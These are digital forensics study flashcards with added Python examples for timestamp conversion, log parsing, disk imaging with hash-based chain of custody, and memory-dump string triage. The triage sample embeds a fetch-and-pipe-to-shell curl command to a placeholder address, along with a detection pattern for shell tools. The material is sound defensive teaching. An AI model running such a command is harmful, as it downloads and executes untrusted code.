4.5 Digital Forensics Flashcards
The application of science to the identification, collection, examination, and analysis of data while preserving the integrity of the information and maintaining a strict chain of custody for the data.
• Collect and protect information relating to an intrusion
– Many different data sources and protection mechanisms
• RFC 3227 - Guidelines for Evidence Collection and Archiving
– A good set of best practices
• Standard digital forensic process
– Acquisition, analysis, and reporting
• Must be detail oriented
– Take extensive notes
Digital forensics
An internal process that an organization undergoes to preserve all data that might relate to a legal action involving the organization.
• A legal technique to preserve relevant information
– Prepare for impending litigation
– Initiated by legal counsel
• Hold notification
– Records custodians are instructed to preserve data
• Separate repository for electronically stored information (ESI)
– Many different data sources and types
– Unique workflow and retention requirements
• Ongoing preservation
– Once notified, there’s an ongoing obligation to preserve data
Legal hold
• A moving record of the event
– Gathers information external to the computer and network
• Captures the status of the screen and other volatile information
– Today’s mobile video devices are remarkable
• Don’t forget security cameras and your phone
• The video content must also be archived
– May have some of the most important record of information
Capture video
Admissible: capable of being allowed or conceded; permissible, as in evidence legally admissible in court.
• Not all data can be used in a court of law
– Different rules in different jurisdictions
• Legal authorization
– Search and seizure of information
• Procedures and tools
– The correct tools used the correct way
• Laboratories
– Proper scientific principles used to analyze the evidence
• Technical and academic qualifications
– Competence and qualifications of experts
Admissibility
• Control evidence
– Maintain integrity
• Everyone who contacts the evidence
– Use hashes
– Avoid tampering
• Label and catalog everything
– Digitally tag all items for ongoing documentation
– Seal and store
Chain of custody
• The time zone determines how the time is displayed
– Document the local device settings
• Different file systems store timestamps differently
– FAT: Time is stored in local time
– NTFS: Time is stored in UTC (GMT)
• Record the time offset from the operating system
– The Windows Registry
– Many different values (daylight saving time, time change information, etc.)
Recording time offsets
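The two storage conventions on this card are easy to mix up when timelining, so here is an added worked example (not part of the flashcards or of any forensic tool) that decodes an NTFS FILETIME (UTC) and a FAT packed date/time (device local time) and puts both on one UTC timeline. It assumes the examiner has recorded the device's offset as Windows stores it: the ActiveTimeBias value (minutes, UTC = local + bias) under HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation. The sample values at the bottom are constructed: the Unix epoch expressed as a FILETIME, and 2024-01-15 14:30:00 packed as FAT date/time words, with a bias of 300 (US Eastern standard time).

```python
from datetime import datetime, timedelta, timezone

# NTFS FILETIME: 100-nanosecond ticks since 1601-01-01 00:00:00 UTC
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_utc(filetime: int) -> datetime:
    """NTFS stores timestamps in UTC, so no device offset is needed to decode them."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def fat_to_naive_local(date_word: int, time_word: int) -> datetime:
    """FAT stores a packed DOS date/time in the device's *local* time.

    date word: bits 15-9 years since 1980, bits 8-5 month, bits 4-0 day
    time word: bits 15-11 hour, bits 10-5 minute, bits 4-0 seconds / 2
    The result is deliberately naive: FAT records no time zone at all.
    """
    year = 1980 + (date_word >> 9)
    month = (date_word >> 5) & 0x0F
    day = date_word & 0x1F
    hour = time_word >> 11
    minute = (time_word >> 5) & 0x3F
    second = (time_word & 0x1F) * 2
    return datetime(year, month, day, hour, minute, second)


def local_to_utc(naive_local: datetime, active_time_bias_min: int) -> datetime:
    """Apply the offset recorded from the examined device.

    Windows defines ActiveTimeBias so that UTC = local + bias
    (+300 for US Eastern standard time, +240 while DST is active).
    """
    shifted = naive_local + timedelta(minutes=active_time_bias_min)
    return shifted.replace(tzinfo=timezone.utc)


def utc_to_local(utc: datetime, active_time_bias_min: int) -> datetime:
    """Display a UTC timestamp the way the examined device would have shown it."""
    device_tz = timezone(timedelta(minutes=-active_time_bias_min))
    return utc.astimezone(device_tz)


def normalise_file_times(ntfs_filetime: int, fat_date: int, fat_time: int,
                         active_time_bias_min: int) -> dict:
    """Return both timestamps on a single UTC timeline as ISO 8601 strings."""
    fat_local = fat_to_naive_local(fat_date, fat_time)
    return {
        "ntfs_utc": filetime_to_utc(ntfs_filetime).isoformat(),
        "fat_utc": local_to_utc(fat_local, active_time_bias_min).isoformat(),
    }


if __name__ == "__main__":
    # Constructed demo values (assumptions, not real evidence): Unix epoch as a
    # FILETIME, 2024-01-15 14:30:00 as FAT words, bias 300 = US Eastern standard time.
    print(normalise_file_times(116444736000000000, 22575, 29632, 300))
```

Note that the offset is taken from the device's own registry, never from the analyst's workstation: the same FAT words decode to a different UTC instant for every bias value, and the daylight-saving entries on the same registry key decide which bias applied on the date in question.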
Give an audit trail that records user events on a PC and is a potential source of evidence in forensic examinations.
• System logs
– Documents important operating system and application events
• Export and store for future reference
– Filter and parse
• Log store
– Linux: /var/log
– Windows: Event Viewer
Event logs
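"Filter and parse" in practice: the following is an added example (not from the flashcards) that parses lines in the traditional /var/log/auth.log syslog format into records with UTC timestamps and counts SSH authentication failures per source address. The log lines, host name, user names and addresses are constructed sample data. Because syslog lines carry neither the year nor the time zone, the parser takes both from the analyst, who must have recorded them from the examined system; lines that fail to parse are returned rather than dropped, so every exported line is accounted for.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample lines in /var/log/auth.log format (no year, no zone).
SAMPLE_AUTH_LOG = """\
Jan 15 14:29:58 web01 sshd[2031]: Failed password for invalid user admin from 203.0.113.5 port 51122 ssh2
Jan 15 14:30:01 web01 CRON[2040]: pam_unix(cron:session): session opened for user root by (uid=0)
Jan 15 14:30:07 web01 sshd[2031]: Failed password for invalid user admin from 203.0.113.5 port 51122 ssh2
Jan 15 14:30:15 web01 sshd[2055]: Accepted publickey for deploy from 198.51.100.7 port 40110 ssh2
-- this line was truncated during export --
"""

# "Mmm dd HH:MM:SS host process[pid]: message" (pid is optional)
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<proc>[^\[:\s]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")


def parse_syslog(text: str, year: int, utc_offset_minutes: int):
    """Parse syslog lines into records whose timestamps are normalised to UTC.

    utc_offset_minutes is the device's offset east of UTC with the ISO sign
    (e.g. -300 for US Eastern standard time), recorded from the device itself.
    Returns (records, unparsed_lines).
    """
    device_tz = timezone(timedelta(minutes=utc_offset_minutes))
    records, unparsed = [], []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            unparsed.append(line)
            continue
        stamp = " ".join(m["ts"].split())  # syslog pads single-digit days: "Jan  5"
        local = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        local = local.replace(tzinfo=device_tz)
        records.append({
            "utc": local.astimezone(timezone.utc).isoformat(),
            "host": m["host"],
            "proc": m["proc"],
            "pid": int(m["pid"]) if m["pid"] else None,
            "msg": m["msg"],
        })
    return records, unparsed


def failed_logins_by_source(records) -> dict:
    """Count sshd password failures per source address."""
    counts = {}
    for rec in records:
        if rec["proc"] != "sshd":
            continue
        m = FAILED_RE.search(rec["msg"])
        if m:
            counts[m["src"]] = counts.get(m["src"], 0) + 1
    return counts


if __name__ == "__main__":
    recs, bad = parse_syslog(SAMPLE_AUTH_LOG, 2024, -300)
    print(failed_logins_by_source(recs), "unparsed:", bad)
```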
• Who might have seen this?
– You won’t know until you ask
• Interview and document
– These folks might not be around later
• Not all witness statements are 100% accurate
– Humans are fallible
Interviews
• Document the findings
– For internal use, legal proceedings, etc.
• Summary information
– Overview of the security event
• Detailed explanation of data acquisition
– Step-by-step method of the process
• The findings
– An analysis of the data
• Conclusion
– Professional results, given the analysis
Reports
Forensics Data Acquisition -
• How long does data stick around?
– Some media is much more volatile than others
– Gather data in order from the most volatile to the least volatile
Order of volatility
Forensics Data Acquisition -
• Copy everything on a storage drive
– Hard drive, SSD, flash drive
• Drive image preparation
– Power down to prevent changes
– Remove storage drive
• Connect to imaging device
– With write-protection
• Forensic clone
– Bit-for-bit copy
– Preserve all data (even the “deleted” data)
Disk
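The "Chain of custody" card (use hashes, maintain integrity, log everyone who touches the item) and this "Disk" card (bit-for-bit copy) come together in the acquisition step, so here is one added example covering both; it is not from the flashcards or from any imaging product. It copies a device block by block, zero-fills any block that cannot be read (the behaviour of dd's conv=noerror,sync, which keeps every byte offset in place so deleted data can still be carved later), records the SHA-256 of the image as written, and produces a custody entry carrying that hash. The "drive" is a constructed 2048-byte buffer with one unreadable block; the item ID and handler name are placeholders.

```python
import hashlib
import io
from datetime import datetime, timezone

BLOCK_SIZE = 512


def forensic_copy(read_block, block_count, image, block_size=BLOCK_SIZE):
    """Bit-for-bit copy of block_count blocks into the file-like object `image`.

    A block whose read raises OSError is replaced by zeros and its index is
    recorded (dd conv=noerror,sync semantics), so later offsets stay aligned.
    Returns (sha256 hex of the image as written, list of unreadable blocks).
    """
    digest = hashlib.sha256()
    unreadable = []
    for index in range(block_count):
        try:
            data = read_block(index)
        except OSError:
            data = b""
            unreadable.append(index)
        data = data[:block_size].ljust(block_size, b"\x00")  # sync: pad short reads
        image.write(data)
        digest.update(data)
    return digest.hexdigest(), unreadable


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_image(image_bytes: bytes, recorded_hash: str) -> bool:
    """Re-hash before every analysis session; a mismatch means corruption or tampering."""
    return sha256_hex(image_bytes) == recorded_hash


def custody_entry(item_id: str, action: str, handler: str, sha256: str, notes: str = "") -> dict:
    """One chain-of-custody record: who handled the item, when (UTC), and the hash observed."""
    return {
        "item": item_id,
        "action": action,
        "handler": handler,
        "utc": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "sha256": sha256,
        "notes": notes,
    }


# --- constructed demo drive: 4 blocks of 512 bytes, block 2 is unreadable (assumption) ---
DEMO_DRIVE = bytes(range(256)) * 8
DEMO_BAD_BLOCKS = {2}


def demo_read_block(index: int) -> bytes:
    """Stand-in for reading sector `index` through a write blocker."""
    if index in DEMO_BAD_BLOCKS:
        raise OSError("I/O error reading sector")
    return DEMO_DRIVE[index * BLOCK_SIZE:(index + 1) * BLOCK_SIZE]


def acquire_demo_drive():
    """Image the demo drive and open its custody log; returns everything for inspection."""
    image = io.BytesIO()
    acquisition_hash, unreadable = forensic_copy(demo_read_block, 4, image)
    image_bytes = image.getvalue()
    log = [custody_entry("DRV-001", "imaged", "examiner1", acquisition_hash,
                         notes=f"{len(unreadable)} unreadable block(s) zero-filled: {unreadable}")]
    return image_bytes, acquisition_hash, unreadable, log


if __name__ == "__main__":
    img, h, bad, log = acquire_demo_drive()
    print("image sha256:", h, "unreadable blocks:", bad)
    print("verified:", verify_image(img, h))
    print(log[0])
```

Every later handler appends another entry with the hash they computed themselves; the log then shows not only who had the item but that its content never changed between them.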
Forensics Data Acquisition -
Short-term memory where data is stored as the processor needs it; a form of computer memory that can be read and changed in any order, typically used to store working data and machine code.
• A difficult target to capture
– Changes constantly
– Capturing data changes the data
• Memory dump
– Grab everything in active RAM
– Many third-party tools
• Important data
– Browsing history
– Clipboard information
– Encryption keys
– Command history
Random access memory (RAM)
Forensics Data Acquisition -
Space on a hard drive used as a temporary location to store information when RAM is fully utilized. Using a [this], a computer can use more memory than what is physically installed in the computer.
• Used by different operating systems
– Slightly different usage in each
• A place to store RAM when memory is depleted
– There’s a lot more space on the storage drive
– Transfer pages of RAM to a storage drive
• Can also contain portions of an application
– Page out portions that aren’t in use
• Contains data similar to a RAM dump
– Anything active on the system
Swap/pagefile
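Both the RAM card (browsing history, command history) and this swap/pagefile card describe the same kind of artifact: readable strings scattered through a large binary blob. The following added example (not from the flashcards or from any memory-forensics tool) does the first-pass triage an examiner runs on a memory dump or pagefile: a strings-style scan that finds both ASCII and UTF-16LE runs (Windows keeps most user-facing text as UTF-16), then pulls out URLs and shell command lines. The memory fragment is constructed; the addresses, host name and commands in it are placeholders.

```python
import re

# Constructed memory fragment mixing ASCII text, a UTF-16LE string and binary.
# The two NULs after the ASCII URL keep its terminator from being misread as
# the low byte of a UTF-16 code unit, a real pitfall when scanning dumps.
SAMPLE_MEMORY = (
    b"\x00\x00\x7fELF\x01\x01\x01\x00garbage\x00"
    + b"https://intranet.example/login?user=alice\x00\x00"
    + "cmd.exe /c whoami".encode("utf-16-le") + b"\x00\x00"
    + b"history: curl http://203.0.113.5/payload.sh | sh\x00"
    + b"\x90\x90\xcc"
)

ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")            # 6+ printable bytes
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")    # 6+ printable UTF-16LE units
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
COMMAND_RE = re.compile(r"\b(?:cmd\.exe|powershell|curl|wget|bash|sh)\b")


def extract_strings(buf: bytes):
    """strings(1)-style scan; returns (offset, encoding, text) sorted by offset."""
    found = []
    for m in ASCII_RUN.finditer(buf):
        found.append((m.start(), "ascii", m.group().decode("ascii")))
    for m in UTF16_RUN.finditer(buf):
        found.append((m.start(), "utf-16le", m.group().decode("utf-16-le")))
    return sorted(found)


def find_artifacts(buf: bytes) -> dict:
    """Triage extracted strings into the classes worth reading first."""
    urls, commands = [], []
    for _offset, _encoding, text in extract_strings(buf):
        urls.extend(URL_RE.findall(text))
        if COMMAND_RE.search(text):
            commands.append(text)
    return {"urls": urls, "commands": commands}


if __name__ == "__main__":
    for offset, encoding, text in extract_strings(SAMPLE_MEMORY):
        print(f"{offset:#08x} {encoding:8} {text}")
    print(find_artifacts(SAMPLE_MEMORY))
```

On a real dump the same scan also surfaces clipboard contents and fragments of documents; encryption keys, by contrast, rarely look like text and need structure-aware searches rather than a strings pass.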
Forensics Data Acquisition -
• OS files and data
– May have been modified
• Core operating system
– Executable files and libraries
– Can be compared later to known-good files
– Usually captured with a drive image
• Other OS data
– Logged-in users
– Open ports
– Processes currently running
– Attached device list
Operating system
Forensics Data Acquisition -
• Mobile devices and tablets
– A more challenging forensics task
• Capture data
– Use an existing backup file
– Transfer image over USB
• Data
– Phone calls
– Contact information
– Text messages
– Email data
– Images and movies
Device